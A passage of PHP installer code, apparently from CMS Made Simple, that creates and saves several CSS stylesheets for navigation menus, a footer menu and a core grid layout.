border: 1px solid #000;\n/* set different from surroundings to stand out */\n	background-color: #ddd;\n	margin: 0 1em 1em 1em;\n	padding: 0.5em;\n	line-height: 1.5em;\n	font-size: 90%;\n}\n/* Separating the divs on the template explanation page */\ndiv.templatecode {\n	margin: 0 0 2.5em;\n}\n/* END TEXT */\n/* LISTS */\n/* lists in content need some margins to look nice */\ndiv#main ul,\ndiv#main ol,\ndiv#main dl {\n	font-size: 1.0em;\n	line-height: 1.4em;\n	margin: 0 0 1.5em 0;\n}\ndiv#main ul li,\ndiv#main ol li {\n	margin: 0 0 0.25em 3em;\n}\n/* definition lists topics on bold */\ndiv#main dl {\n	margin-bottom: 2em;\n	padding-bottom: 1em;\n	border-bottom: 1px solid #c0c0c0;\n}\ndiv#main dl dt {\n	font-weight: bold;\n	margin: 0 0 0 1em;\n}\ndiv#main dl dd {\n	margin: 0 0 1em 1em;\n}\n/* END LISTS */
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('Layout Top menu + 2 columns');
$css->set_description('Navigation CSS rules used in CSSMenu top + 2 columns, ShadowMenu Tab + 2 columns and Top simple navigation + left subnavigation + 1 column Designs');
$css->set_content($txt);
$css->set_media_types('screen');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
/******************** MENU *********************/\n#menu_vert {\n	margin: 0;\n	padding: 0;\n}\n#menu_vert ul {\n/* remove any bullets */\n	list-style: none;\n/* margin/padding set in li */\n	margin: 0px;\n	padding: 0px;\n}\n#menu_vert ul ul {\n	margin: 0;\n/* padding right sets second level li in on right from first li */\n	padding: 0px 5px 0px 0px;\n/* replaces bottom of li.menuactive menuparent, looks like li below it, set in 5px more, is sitting on top of it */\n	background: transparent url([[root_url]]/uploads/ngrey/liup.gif) no-repeat right -4px;\n}\n#menu_vert li {\n/* remove any bullets */\n	list-style: none;\n/* negative bottom margin pulls them together, images look like one border between */\n	margin: 0px 0px -1px;\n/* bottom padding pushes "a" up enough to show our image */\n	padding: 0px 0px 4px 0px;\n/* you can set your own image here */\n	background: transparent url([[root_url]]/uploads/ngrey/liup.gif) no-repeat right bottom;\n}\n#menu_vert li.currentpage {\n	padding: 0px 0px 3px 0px;\n}\n#menu_vert li.menuactive {\n	margin: 0;\n	padding: 0px;\n/* replaced by image in ul ul */\n	background: none;\n}\n#menu_vert li.menuactive ul {\n	margin: 0;\n}\n#menu_vert li.activeparent {\n	margin: 0;\n	padding: 0px;\n}\n/* fix stupid IE6 bug with display:block; */\n* html #menu_vert li {\n	height: 1%;\n}\n* html #menu_vert li a {\n	height: 1%;\n}\n* html #menu_vert li hr {\n	height: 1%;\n}\n/** end fix **/\n/* first level links */\ndiv#menu_vert a {\n/* IE6 has problems with this, fixed above */\n	display: block;\n/* some air for it */\n	padding: 0.8em 0.3em 0.5em 1.5em;\n/* this will be link color for all levels */\n	color: #18507C;\n/* Fixes IE7 whitespace bug */\n	min-height: 1em;\n/* no underline for links */\n	text-decoration: none;\n/* you can set your own image here this is tall enough to cover text heavy links */\n	background: transparent url([[root_url]]/uploads/ngrey/libk.gif) no-repeat right top;\n}\n/* next level links, more padding and smaller font */\ndiv#menu_vert ul ul a {\n	font-size: 90%;\n	padding: 0.8em 0.3em 0.5em 2.8em;\n}\n/* third level links, more padding */\ndiv#menu_vert ul ul ul a {\n	padding: 0.5em 0.3em 0.3em 3em;\n}\n/* hover state for all links */\ndiv#menu_vert a:hover {\n	background-color: transparent;\n	color: #595959;\n	text-decoration: underline;\n}\ndiv#menu_vert a.activeparent:hover {\n	color: #595959;\n}\n/* active parent, that is the first level parent of a child page that is the current page */\ndiv#menu_vert li.activeparent {\n/* you can set your own image here */\n	background: transparent url([[root_url]]/uploads/ngrey/liup.gif) no-repeat right -65px;\n/* white to contrast with background image */\n	color: #fff;\n}\ndiv#menu_vert li.activeparent a.activeparent {\n/* you can set your own image here */\n	background: transparent url([[root_url]]/uploads/ngrey/libk.gif) no-repeat right top;\n/* to contrast with background image */\n	color: #000;\n}\ndiv#menu_vert li a.parent {\n/* takes left padding out so span image has room on left */\n	padding-left: 0em;\n}\ndiv#menu_vert ul ul li a.parent {\n/* increased padding on left offsets it from one above */\n	padding-left: 0.9em;\n}\ndiv#menu_vert li a.parent span {\n	display: block;\n	margin: 0;\n/* adds left padding taken out of "a.parent" */\n	padding-left: 1.5em;\n/* arrow on left for pages with children, points down, you can set your own image here */\n	background: transparent url([[root_url]]/uploads/ngrey/active.png) no-repeat 2px center;\n}\ndiv#menu_vert li a.parent:hover {\n/* removes underline hover effect */\n	text-decoration: none;\n}\ndiv#menu_vert li a.parent:hover span {\n	display: block;\n	margin: 0;\n	padding-left: 1.5em;\n/* arrow on left for pages with children, points right for hover, you can set your own image here */\n	background: transparent url([[root_url]]/uploads/ngrey/parent.png) no-repeat 2px center;\n}\ndiv#menu_vert li a.menuactive.menuparent {\n/* sets it in a little more than a.parent */\n	padding-left: 0.35em;\n}\ndiv#menu_vert ul ul li a.menuactive.menuparent {\n/* sets it in a little more on next level */\n	padding-left: 0.99em;\n}\ndiv#menu_vert li a.menuactive.menuparent span {\n	display: block;\n	margin: 0;\n/* to contrast with non active pages */\n	font-weight: bold;\n	padding-left: 1.5em;\n/* arrow on left for active pages with children, points right, you can set your own image here */\n	background: transparent url([[root_url]]/uploads/ngrey/parent.png) no-repeat 2px center;\n}\ndiv#menu_vert li a.menuactive.menuparent:hover {\n	text-decoration: none;\n	color: #18507C;\n}\ndiv#menu_vert ul ul li a.activeparent {\n	color: #fff;\n}\n/* current pages in the default Menu Manager template are unclickable. This is for current page on first level */\ndiv#menu_vert ul h3 {\n	display: block;\n/* some air for it */\n	padding: 0.8em 0.5em 0.5em 1.5em;\n/* this will be link color for all levels */\n	color: #000;\n/* instead of the normal font size for <h3> */\n	font-size: 1em;\n/* as <h3> normally has some margin by default */\n	margin: 0;\n/* you can set your own image here, same as "a" */\n	background: transparent url([[root_url]]/uploads/ngrey/libk.gif) no-repeat right top;\n}\n/* next level current pages, more padding, smaller font and no background color or bottom border */\ndiv#menu_vert ul ul h3 {\n	font-size: 90%;\n	padding: 0.8em 0.5em 0.5em 2.8em;\n/* you can set your own image here, same as "a" */\n	background: transparent url([[root_url]]/uploads/ngrey/libk.gif) no-repeat right top;\n	color: #000;\n}\n/* current page on third level, more padding */\ndiv#menu_vert ul ul ul h3 {\n	padding: 0.6em 0.5em 0.2em 3em;\n}\n/* BIG NOTE: I didn''t do anything to these, never tested */\n/* section header */\ndiv#menu_vert li.sectionheader {\n	border-right: none;\n	padding: 0.8em 0.5em 0.5em 1.5em;\n	background: transparent url([[root_url]]/uploads/ngrey/libk.gif) no-repeat right top;\n	line-height: 1em;\n	margin: 0;\n        color: #18507C;\n        cursor:text;\n}\n/* separator */\ndiv#menu_vert .separator {\n	height: 1px !important;\n	margin-top: -1px;\n	margin-bottom: 0;\n	-padding: 2px 0 2px 0;\n	background-color: #000;\n	overflow: hidden !important;\n	line-height: 1px !important;\n	font-size: 1px;\n/* for ie */\n}\ndiv#menu_vert li.separator hr {\n	display: none;\n/* this is for accessibility */\n}
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('Navigation Simple - Vertical');
$css->set_description('Navigation CSS rules used in Left simple navigation + 1 column and Top simple navigation + left subnavigation + 1 column Designs');
$css->set_content($txt);
$css->set_media_types('screen');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
/* by Alexander Endresen and mark */\n#menu_vert {\n/* no margin/padding so it fills the whole div */\n	margin: 0;\n	padding: 0;\n}\n.clearb {\n/* needed for some browsers */\n	clear: both;\n}\n#menuwrapper {\n/* set the background color for the menu here */\n	background-color: #243135;\n/* IE6 Hack */\n	height: 1%;\n	width: auto;\n/* one border at the top */\n	border-top: 1px solid #3F565C;\n	margin: 0;\n	padding: 0;\n}\nul#primary-nav {\n	list-style-type: none;\n	margin: 0px;\n	padding-top: 10px;\n	padding-left: 10px;\n}\n#primary-nav ul {\n/* remove any default bullets */\n	list-style-type: none;\n/* sets width of second level ul to background image */\n	width: 210px;\n	margin: 0px;\n	padding: 0px;\n/* make the ul stay in place so when we hover it lets the drops go over the content instead of displacing it */\n	position: absolute;\n/* top being the bottom of the li it comes out of */\n	top: auto;\n/* keeps it hidden till hover event */\n	display: none;\n/* room at top for li so image top shows correct */\n	padding-top: 9px;\n/* set your image here, tall enough for the ul */\n	background: url([[root_url]]/uploads/ngrey/ultopup.png) no-repeat left top;\n}\n/* IE6 hacks on the above code */\n* html #primary-nav ul {\n	padding-top: 13px;\n	background: url([[root_url]]/uploads/ngrey/ultopup.gif) no-repeat left top;\n}\n#primary-nav ul ul {\n/* insures no top margins */\n	margin-top: 0px;\n/* pulls the last ul back over the preceding ul */\n	margin-left: -1px;\n/* keeps the left side of this ul on the right side of the preceding ul */\n	left: 100%;\n/* negative margin pulls the left centered in li next to it */\n	top: -3px;\n/* set your image here, tall enough for the ul, this is the left arrow for third level ul */\n	background: url([[root_url]]/uploads/ngrey/ultoprt.png) no-repeat left top;\n}\n/* IE6 hacks on the above code */\n* html #primary-nav ul ul {\n	margin-top: 0px;\n	padding-left: 5px;\n	left: 100%;\n	top: -7px;\n/* IE6 gets gif as it can''t handle transparent png */\n	background: url([[root_url]]/uploads/ngrey/ultoprt.gif) no-repeat right top;\n}\n#primary-nav li {\n/* a little space to the left of each top level menu item */\n	margin-left: 5px;\n/* floating left will set menu items to line up left to right else they will stack top to bottom */\n	float: left;\n}\n#primary-nav li li {\n/* a little more space to the left of each menu item */\n	margin-left: 8px;\n/* keeps them tight to the one above, no missed hovers */\n	margin-top: -1px;\n/* removes the left float set in first li so these will stack from top down */\n	float: none;\n/* relative to the ul they are in */\n	position: relative;\n}\n/* IE6 hacks on the above code */\n* html #primary-nav li li {\n	margin-left: 6px;\n/* helps hold it inside the ul */\n	width: 171px;\n}\nul#primary-nav li a {\n/* specific font size, this could be larger or smaller than default font size */\n	font-size: 1em;\n/* make sure we keep the font normal */\n	font-weight: normal;\n/* set default link colors */\n	color: #fff;\n/* doing tab menus require a bit different padding, this will give room on right for image to show, adjust to width of your image */\n	padding: 0px 11px 0px 0px;\n/* makes it hold a shape */\n	display: block;\n/* remove default "a" underline */\n	text-decoration: none;\n}\nul#primary-nav li a span {\n/* takes normal "a" padding minus some for right image */\n	padding: 12px 4px 12px 15px;\n/* makes it hold a shape */\n	display: block;\n}\nul#primary-nav li a:hover {\n/* kind of obvious */\n	background-color: transparent;\n}\nul#primary-nav li {\n/* set your image here */\n	background:  url([[root_url]]/uploads/ngrey/navrttest.gif) no-repeat right -51px;\n}\nul#primary-nav li span {\n/* set your image here */\n	background:  url([[root_url]]/uploads/ngrey/navlefttest.gif) repeat-x left -51px;\n/* set text color here also to insure color */\n	color: #fff;\n/* just to be sure */\n	font-weight: normal;\n}\nul#primary-nav li li {\n/* remove any image set in first level li */\n	background:  none;\n}\nul#primary-nav li li span {\n/* remove any image set in first level li span */\n	background:  none;\n/* set text color here also to insure color */\n	color: #fff;\n/* just to be sure */\n	font-weight: normal;\n}\nul#primary-nav li:hover,\nul#primary-nav li.menuh,\nul#primary-nav li.menuparenth {\n/* set hover image, right side */\n	background:  url([[root_url]]/uploads/ngrey/navrttest.gif) no-repeat right 0px;\n}\nul#primary-nav li:hover span,\nul#primary-nav li.menuh span,\nul#primary-nav li.menuparenth span {\n/* set hover image, left side */\n	background:  url([[root_url]]/uploads/ngrey/navlefttest.gif) repeat-x left 0px;\n/* change text color on hover */\n	color: #000;\n	font-weight: normal;\n}\n/* IE6 hacks, the JS used for hover effect in IE6 puts class menuh on li, unless they have a class then just an "h" as seen above and below */\nul#primary-nav li li.menuh {\n	background:  none;\n	font-weight: normal;\n}\n/* IE6 hacks */\nul#primary-nav li.menuparenth li span {\n	background:  none;\n	color: #000;\n	font-weight: normal;\n}\n/* IE6 hacks */\nul#primary-nav li.menuparenth li.menuparent span {\n/* gif for IE6, as it can''t handle transparent png */\n	background:  url([[root_url]]/uploads/ngrey/parent.gif) no-repeat right center;\n	color: #000\n}\n/* IE6 hacks */\nul#primary-nav li.menuparenth li.menuh span {\n	background:  none;\n	color: #FFF;\n	font-weight: normal;\n}\n/* IE6 hacks */\nul#primary-nav li.menuparenth li.menuparenth {\n	background:  none;\n	color: #FFF;\n	font-weight: normal;\n}\nul#primary-nav li.menuactive a {\n/* set your image here for active tab right */\n	background:  url([[root_url]]/uploads/ngrey/navrttest.gif) no-repeat right 0px;\n}\nul#primary-nav li a.menuactive span {\n/* set your image here for active tab left */\n	background:  url([[root_url]]/uploads/ngrey/navlefttest.gif) repeat-x left 0px;\n/* non active is #FFF/white, we need #000/black to contrast with light background */\n	color: #000;\n/* bold to set it off from non active */\n	font-weight: bold;\n}\n#primary-nav li li a {\n/* second level padding, no image and not as big */\n	padding: 5px 10px;\n/* to keep it within li */\n	width: 165px;\n/* space between them */\n	margin: 5px;\n	background: none;\n}\n/* IE6 hacks to above code */\n* html #primary-nav li li a {\n	padding: 5px 10px;\n	width: 165px;\n	margin: 0px;\n	color: #000;\n}\n#primary-nav li li:hover {\n/* remove image set in first level */\n	background: none;\n}\n#primary-nav li li a:hover {\n/* set different image than first level */\n	background:  url([[root_url]]/uploads/ngrey/darknav.png) repeat-x left center;\n/* we need #FFF/white to contrast with dark background */\n	color: #FFF;\n}\n#primary-nav li.menuparent li a:hover span {\n/* insures text color */\n	color: #FFF;\n}\nul#primary-nav li:hover li a span {\n/* first level is #FFF/white, we need #000/black to contrast with light background */\n	color: #000;\n/* just to insure normal */\n	font-weight: normal;\n}\n#primary-nav li li.menuactive a.menuactive, #primary-nav li li.menuactive a.menuactive:hover {\n/* set your image here, lighter than hover */\n	background:  url([[root_url]]/uploads/ngrey/nav.png) repeat-x left 0px;\n/* non active is #FFF/white, we need #000/black to contrast with light background */\n	color: #000;\n}\n#primary-nav li li.menuactive a.menuactive span {\n/* insures text color */\n	color: #000\n}\n#primary-nav li li.menuactive a.menuactive:hover span {\n/* insures text color */\n	color: #000;\n}\n/* IE6 hacks to above code */\n#primary-nav li li.menuparenth a.menuparent span {\n/* right arrow for menu parent, IE6 gif */\n	background:  url([[root_url]]/uploads/ngrey/parent.gif) no-repeat right center;\n	color: #000\n}\n/* IE6 hacks to above code */\n#primary-nav li li.menuparenth a.menuparent:hover span {\n	color: #FFF\n}\n#primary-nav li li.menuparent a.menuparent span {\n/* right arrow for parent item */\n	background:  url([[root_url]]/uploads/ngrey/parent.gif) no-repeat right center;\n}\n#primary-nav li.menuactive li a:hover span {\n/* black text */\n	color: #000\n}\nul#primary-nav li li a.menuactive  span {\n/* remove image set in first level */\n	background:  none;\n	font-weight: normal;\n}\n#primary-nav li.menuactive li a {\n/* second level active link color */\n	color: #0587A9;\n	text-decoration: none;\n	background: none;\n}\n#primary-nav li.menuactive li a:hover {\n/* dark image for hover */\n	background:  url([[root_url]]/uploads/ngrey/darknav.png) repeat-x left center;\n}\n#primary-nav li.menuactive li a:hover span {\n/* white text to contrast with dark background image on hover */\n	color: #FFF;\n}\nul#primary-nav li:hover li a span, ul#primary-nav li.menuparenth li a span {\n	padding: 0px;\n	background:  none;\n}\n/* this is a special li type from the menu template, used to hold the bottom image for ul set above */\n#primary-nav ul li.separator, #primary-nav .separator:hover {\n/* set same as ul */\n	width: 210px;\n/* height of image */\n	height: 9px;\n/* negative margin pulls it down to cover ul image */\n	margin: 0px 0px -8px;\n/* set your image here */\n	background: url([[root_url]]/uploads/ngrey/ulbtmrt.png) no-repeat left bottom;\n}\n/* same as above for next level to insure it shows correct */\n#primary-nav ul ul li.separator, #primary-nav ul ul li.separator:hover {\n	height: 9px;\n	margin: 0px 0px -8px;\n	background: url([[root_url]]/uploads/ngrey/ulbtmrt.png) no-repeat left bottom;\n}\n/* IE6 hacks */\n* html #primary-nav ul li.separator {\n	height: 2px;\n	background: url([[root_url]]/uploads/ngrey/ulbtmrt.gif) no-repeat left bottom;\n}\n/* IE6 hacks */\n* html #primary-nav ul li.separatorh {\n	margin: 0px 0px -8px;\n	height: 2px;\n	background: url([[root_url]]/uploads/ngrey/ultop.gif) no-repeat left top;\n}\n/* The magic - set to work for up to a 3 level menu, but can be increased unlimited, for fourth level add\n#primary-nav li:hover ul ul ul,\n#primary-nav li.menuparenth ul ul ul,\n*/\n#primary-nav ul,\n#primary-nav li:hover ul,\n#primary-nav li:hover ul ul,\n#primary-nav li.menuparenth ul,\n#primary-nav li.menuparenth ul ul {\n	display: none;\n}\n/* for fourth level add\n#primary-nav ul ul ul li:hover ul,\n#primary-nav ul ul ul li.menuparenth ul,\n*/\n#primary-nav li:hover ul,\n#primary-nav ul li:hover ul,\n#primary-nav ul ul li:hover ul,\n#primary-nav li.menuparenth ul,\n#primary-nav ul li.menuparenth ul,\n#primary-nav ul ul li.menuparenth ul {\n	display: block;\n}\n/* IE Hacks */\n#primary-nav li li {\n	float: left;\n	clear: both;\n}\n#primary-nav li li a {\n	height: 1%;\n}
EOT;
$css = new CmslayoutStylesheet;
$css->set_name('Navigation ShadowMenu - Horizontal');
$css->set_content($txt);
$css->set_media_types('screen');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
/* Vertical menu for the CMS CSS Menu Module */\n/* by Alexander Endresen and mark */\n#menuwrapper {\n/* just smaller than it's containing div */\n	width: 95%;\n	margin-left: 0px;\n/* room at bottom */\n	margin-bottom: 10px;\n}\n/* Unless you know what you do, do not touch this */\n#primary-nav, #primary-nav ul {\n/* remove any default bullets */\n	list-style: none;\n	margin: 0px;\n	padding: 0px;\n/* make sure it fills out */\n	width: 100%;\n/* just a little bump */\n	margin-left: 1px;\n}\n#primary-nav li {\n/* negative bottom margin pulls them together, images look like one border between */\n	margin-bottom: -1px;\n/* keeps within it's container */\n	position: relative;\n/* bottom padding pushes "a" up enough to show our image */\n	padding: 0px 0px 4px 0px;\n/* you can set your own image here */\n	background: url([[root_url]]/uploads/ngrey/liup.gif) no-repeat right bottom;\n}\n#primary-nav li li {\n/* you can set your width here, if no width or set auto it will only be as wide as the text in it  */\n	width: 190px;\n/* changes padding inherited from first level */\n	padding: 0px 10px;\n/* removes first level li image */\n	background-image: none;\n}\n/* Styling the basic appearance of the menu "a" elements */\nul#primary-nav li a {\n/* specific font size, this could be larger or smaller than default font size */\n	font-size: 1em;\n/* make sure we keep the font normal */\n	font-weight: normal;\n/* set default link colors */\n	color: #595959;\n/* pushes li out from the text, sort of like making links a certain size, if you give them a set width and/or height you may limit you ability to have as much text as you need */\n	padding: 0.8em 0.5em 0.5em 0.5em;\n/* makes it hold a shape */\n	display: block;\n/* removes underline from default link setting */\n	text-decoration: none;\n/* you can set your own image here this is tall enough to cover text heavy links */\n	background: url([[root_url]]/uploads/ngrey/libk.gif) no-repeat right top;\n}\nul#primary-nav a span {\n/* makes it hold a shape */\n	display: block;\n/* pushes text to right */\n	padding-left: 1.5em;\n}\nul#primary-nav li a:hover {\n/* stops image flicker in some browsers */\n	background: url([[root_url]]/uploads/ngrey/libk.gif) no-repeat right top;\n/* changes text color on hover */\n	color: #899092\n}\nul#primary-nav li li a:hover {\n/* you can set your own image here, second level "a" */\n	background:  url([[root_url]]/uploads/ngrey/darknav.png) repeat-x left center;\n/* contrast color to image behind it */\n	color: #FFF\n}\nul#primary-nav li a.menuactive {\n/* black and bold to set it off from non active */\n	color: #000;\n	font-weight: bold;\n}\nul#primary-nav li ul a {\n/* insure alignment */\n	text-align: left;\n	margin: 0px;\n/* relative to it's container */\n	position: relative;\n/* even padding all 4 sides */\n	padding: 6px;\n/* make sure we keep the font normal */\n	font-weight: normal;\n/* set default link colors from here on */\n	color: #000;\n/* remove any background that may have been set in level above */\n	background: none;\n}\nul#primary-nav li ul {\n/* remove any default bullets */\n	list-style-type: none;\n/* sets width of second level ul to background image */\n	width: 209px;\n	height: auto;\n/* negative margin pulls it over the parent ul */\n	margin: 0px 0px 0px -2px;\n/* top padding gives room for image shadow and pushes li down into image */\n	padding: 10px 0px 0px;\n/* make the ul stay in place so when we hover it lets the drops go over the content instead of displacing it */\n	position: absolute;\n/* keeps the left side of this ul on the right side of the preceding ul */\n	left: 100%;\n/* negative top pulls up so left arrow centered in li next to it */\n	top: -2px;\n	display: none;\n/* set your image here, tall enough for the ul, this is the left arrow for second ul and on */\n	background: url([[root_url]]/uploads/ngrey/ultoprt.png) no-repeat left top;\n}\n/* a lot of the same as above, minor changes */\nul#primary-nav li ul ul {\n	list-style-type: none;\n/* bit more negative left margin */\n	margin: 0px 0px 0px -8px;\n/* you can call a property twice but not a property:'value', this flat lines it */\n	padding: 0px;\n/* now we just change one with 'property'-top:value */\n	padding-top: 10px;\n	position: absolute;\n	width: 209px;\n	height: auto;\n/* negative top pulls up so left arrow centered in li next to it, more on 3rd ul covers default drop increase */\n	top: -5px;\n	left: 100%;\n	display: none;\n/* set your image here */\n	background: url([[root_url]]/uploads/ngrey/ultoprt.png) no-repeat left top;\n}\n* html ul#primary-nav li ul {\n/* gif for IE6, as it can't handle transparent png */\n	background: url([[root_url]]/uploads/ngrey/ultoprt.gif) no-repeat left top;\n}\n* html ul#primary-nav li ul ul {\n/* gif for IE6, as it can't handle transparent png */\n	background: url([[root_url]]/uploads/ngrey/ultoprt.gif) no-repeat left top;\n}\n/* this is a special li type from the menu template, used to hold the bottom image for ul set above */\n#primary-nav ul li.separator, #primary-nav .separator:hover {\n/* set same as ul */\n	width: 209px;\n	padding: 0px;\n/* height of image */\n	height: 9px;\n/* negative margin pulls it down to cover ul image */\n	margin: 0px 0px -9px;\n/* set your image here */\n	background: url([[root_url]]/uploads/ngrey/ulbtmrt.png) no-repeat left bottom;\n}\n/* IE6 'star html' Hack */\n* html #primary-nav  li ul li.separator {\n	height: 2px;\n/* set your image here */\n	background: url([[root_url]]/uploads/ngrey/ulbtmrt.gif) no-repeat left bottom;\n}\n/* Fixes IE7 bug*/\n#primary-nav li, #primary-nav li.menuparent {\n	min-height: 1em;\n}\n/* Styling the basic apperance of the active page elements (shows what page in the menu is being displayed) */\n#primary-nav li li.menuactive a.menuactive {\n/* contrast color to image behind it */\n	color: #FFF;\n/* not bold as text color and image behind it set it off from non active */\n	font-weight: normal;\n/* set your image here, dark grey image with white text set above*/\n	background:  url([[root_url]]/uploads/ngrey/darknav.png) repeat-x left center;\n}\n#primary-nav li.menuparent span {\n/* padding on left for image */\n	padding-left: 1.5em;\n/* down arrow to note it has children, left side of text */\n	background: url([[root_url]]/uploads/ngrey/active.png) no-repeat left center;\n}\n#primary-nav li.menuparent:hover li.menuparent span {\n/* remove left padding as image is on right side of text */\n	padding-left: 0;\n/* right arrow to note it has children, right side of text */\n	background: url([[root_url]]/uploads/ngrey/parent.png) no-repeat right center;\n}\n#primary-nav li.menuparenth li.menuparent span,\n#primary-nav li.menuparenth li.menuparenth span {\n/* same as above but this is for IE6, gif image as it can't handle transparent png */\n	padding-left: 0;\n	background: url([[root_url]]/uploads/ngrey/parent.gif) no-repeat right center;\n}\n#primary-nav li.menuparent:hover span,\n#primary-nav li.menuparent.menuactive span,\n#primary-nav li.menuparent.menuactiveh span,\n#primary-nav li.menuparenth span {\n/* right arrow on hover */\n	background: url([[root_url]]/uploads/ngrey/parent.png) no-repeat left center;\n}\n#primary-nav li li span,\n#primary-nav li.menuparent li span,\n#primary-nav li.menuparent:hover li span,\n#primary-nav li.menuparenth li span,\n#primary-nav li.menuparenth li.menuparenth li span,\n#primary-nav li.menuparent li.menuparent li span,\n#primary-nav li.menuparent li.menuparent:hover li span {\n/* removes any images set above unless it's a parent or active parent */\n	background:  none;\n	padding-left: 0px;\n}\n/* Styling the appearance of menu items on hover */\n#primary-nav li:hover li a,\n#primary-nav li.menuh li a,\n#primary-nav li.menuparenth li a,\n#primary-nav li.menuactiveh li a {\n/* removes any images set above unless it's a parent or active parent */\n	background:  none;\n	color: #000;\n}\n/* The magic - set to work for up to a 3 level menu, but can be increased unlimited, for fourth level add\n#primary-nav li:hover ul ul ul,\n#primary-nav li.menuparenth ul ul ul,\n*/\n#primary-nav ul,\n#primary-nav li:hover ul,\n#primary-nav li:hover ul ul,\n#primary-nav li.menuparenth ul,\n#primary-nav li.menuparenth ul ul {\n	display: none;\n}\n/* for fourth level add\n#primary-nav ul ul ul li:hover ul,\n#primary-nav ul ul ul li.menuparenth ul,\n*/\n#primary-nav li:hover ul,\n#primary-nav ul li:hover ul,\n#primary-nav ul ul li:hover ul,\n#primary-nav li.menuparenth ul,\n#primary-nav ul li.menuparenth ul,\n#primary-nav ul ul li.menuparenth ul {\n	display: block;\n}\n/* IE Hack, will cause the css to not validate */\n#primary-nav li, #primary-nav li.menuparenth {\n	_float: left;\n	_height: 1%;\n}\n#primary-nav li a {\n	_height: 1%;\n}\n/* BIG NOTE: I didn't do anything to these 2, never tested */\n#primary-nav li.sectionheader {\n	border-left: 1px solid #006699;\n	border-top: 1px solid #006699;\n	font-size: 130%;\n	font-weight: bold;\n	padding: 1.5em 0 0.8em 0.5em;\n	background-color: #fff;\n	margin: 0;\n	width: 100%;\n}\n/* separator */\n#primary-nav li hr.separator {\n	display: block;\n	height: 0.5em;\n	color: #abb0b6;\n	background-color: #abb0b6;\n	width: 100%;\n	border: 0;\n	margin: 0;\n	padding: 0;\n	border-top: 1px solid #006699;\n	border-right: 1px solid #006699;\n}
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('Navigation ShadowMenu - Vertical');
$css->set_description('Navigation CSS rules used in ShadowMenu left + 1 column Design');
$css->set_content($txt);
$css->set_media_types('screen');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
#footer ul {\n/* some margin is set in the footer padding */\n   margin: 0px;\n/* calling a specific side, left in this case */\n   margin-left: 5px;\n   padding: 0px;\n/* remove any default bullets, image used in li call */\n   list-style: none;\n}\n#footer ul li {\n/* remove any default bullets, image used for consistency */\n   list-style: none;\n/* float left to set first level li items across the top */\n   float:left;\n/* a little margin at top */\n   margin: 5px 0px 0px;\n/* padding all the way around */\n   padding: 5px;\n/* you can set your own image here, used for consistency */\n   background: url([[root_url]]/uploads/ngrey/dot.gif) no-repeat left 10px;\n}\n#footer ul li a {\n/* this will make the "a" link a solid shape */\n   display:block;\n   margin: 2px 0px 4px;\n   padding: 0px 5px 5px 5px;\n}\n/* set h3 to look like "a" */\n#footer li h3 {\n   font-weight:normal;\n   font-size:100%;\n   margin: 2px 0px 2px 0px;\n   padding: 0px 5px 5px 5px;\n}\n/* set h3 to look like "a", less margin at this level */\n#footer li li h3 {\n   font-weight:normal;\n   font-size:100%;\n   margin: 0px;\n   padding: 0px 5px 5px 5px;\n}\n#footer ul li li {\n/* remove any default bullets, image used for consistency */\n   list-style: none;\n/* remove float so they line up under top li */\n   float:none;\n/* less margin/padding */\n   margin: 0px;\n   padding: 0px 0px 0px 5px;\n/* you can set your own image here, used for consistency */\n   background: url([[root_url]]/uploads/ngrey/dot.gif) no-repeat left 3px;\n}\n/* fix for IE6 */\n* html #footer ul li a {\n   margin: 2px 0px 0px;\n   padding: 0px 5px 5px 5px;\n}\n* html #footer ul li li a {\n   margin: 0px 0px 0px;\n   padding: 0px 5px 0px 5px;\n}\n/* End fix for IE6 */\n#footer ul ul {\n/* remove float so they line up under top li */\n   float:none;\n/* a little margin to offset it */\n   margin: 0px 0px 0px 8px;\n   padding: 0;\n}\n#footer ul ul ul {\n/* remove float so they line up under li above it */\n   float:none;\n/* a little margin to offset it */\n   margin: 0px 0px 0px 8px;\n   padding: 0;\n}
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('Navigation FatFootMenu');
$css->set_description('Footer navigation CSS rules used in CSSMenu left + 1 column, CSSMenu top + 2 columns, Left simple navigation + 1 column, ShadowMenu left + 1 column, ShadowMenu Tab + 2 columns and Top simple navigation + left subnavigation + 1 column');
$css->set_content($txt);
$css->set_media_types('screen');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
/*\n  @Nuno Costa [criacaoweb.net] Core CSS.\n  @Licensed under GPL and MIT.\n  @Status: Stable\n  @Version: 0.1-20090418\n  \n  @Contributors:\n  \n  --------------------------------------------------------------- \n*/\n/*----------- Global Containers ----------- */\n/* \n.core-wrap-100   =  width - 100% of Browser Fluid\n.core-wrap-960   =  width - 960px  - fixed\n.core-wrap-780   =  width - 780px  - fixed\n.custom-wrap-x   =  width -  custom   - declared in another css (your site css)\n*/\n.core-wrap-100 {\n	width: 100%;\n}\n.core-wrap-960 {\n	width: 960px;\n}\n.core-wrap-780 {\n	width: 780px;\n}\n.core-wrap-100,\n.core-wrap-960,\n.core-wrap-780,\n.custom-wrap-x {\n	margin-left: auto;\n	margin-right: auto;\n}\n/*----------- Global Float ----------- */\n.core-wrap-100  .core-float-left,\n.core-wrap-960  .core-float-left,\n.core-wrap-780  .core-float-left,\n.custom-wrap-x  .core-float-left {\n	float: left;\n	display: inline;\n}\n.core-wrap-100  .core-float-right,\n.core-wrap-960  .core-float-right,\n.core-wrap-780  .core-float-right,\n.custom-wrap-x  .core-float-right {\n	float: right;\n	display: inline;\n}\n/*----------- Global Center ----------- */\n.core-wrap-100   .core-center,\n.core-wrap-960   .core-center,\n.core-wrap-780   .core-center,\n.custom-wrap-x   .core-center {\n	margin-left: auto;\n	margin-right: auto;\n}
EOT;
$css = new CmsLayoutStylesheet;
$css->set_name('ncleanbluecore');
$css->set_description('Grid CSS rules used in NCleanBlue Design');
$css->set_content($txt);
$css->set_media_types('screen');
$css->save();
$css_list[$css->get_name()] = $css;

$txt = <<<EOT
